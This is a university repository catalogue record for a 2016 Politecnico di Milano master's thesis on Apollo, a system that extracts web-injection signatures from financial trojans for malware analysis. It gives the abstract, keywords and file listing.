POLITESI Politecnico di Milano Servizi Bibliotecari di Ateneo Servizi Bibliotecari di Ateneo
authorized users
Please use this identifier to cite or link to this thesis: http://hdl.handle.net/10589/122746

Date: 27-Jul-2016
Academic year: 2015/2016
Title: Apollo : eliciting and analyzing advanced WebInject-based malware
English abstract: Financial trojans, a particular kind of information-stealing malware, are one of the prevalent Internet threats. Their purpose is to automatically commit fraudulent transactions by silently stealing users' credentials to bank accounts of infected machines. Their level of sophistication has steadily grown in the last few years, keeping up at the same pace with reinforced security measures introduced by financial institutions. The attack schema is devious, as, in many cases, it produces no traces of the attack, leaving the victim unaware of the fraud, often, for a long period. These attacks leverage the API hooking techniques, to install a malicious payload in the victim's browser, in order to steal user credentials or modify web-pages inserting new content (so called web-injection). We propose an automated system, Apollo, capable of extracting web-injection signatures from financial trojans by analyzing two different versions of the same visited web-page, prior and after the malicious injections, and identifying the portions of the original page source that trigger the malicious behavior of the malware under analysis. The system is able to elicit the malware's behavior on specified web-pages as well as to extract the web-injection targets through dynamic memory inspection. We evaluated Apollo against a dataset of working financial trojan samples showing that our method successfully extracts correct web-injection signatures together with the corresponding URL targets.
Italian keywords: financial trojans; WebInject; malware; malware analisi; MITB; man-in-the-browser; Web-injection
English keywords: financial trojans; WebInject; malware; malware analysis; MITB; man-in-the-browser; Web-injection
Language: eng
Appears in Collections:POLITesi >Tesi Specialistiche/Magistrali

Files in This Item:

File Description SizeFormatVisibility
Samuele Rodi - Master Thesis v2.0.pdfMaster Thesis v2.02.87 MBAdobe PDFView/Open


  Support, maintenance and development by SURplus team @ CINECA- Powered by DSpace Software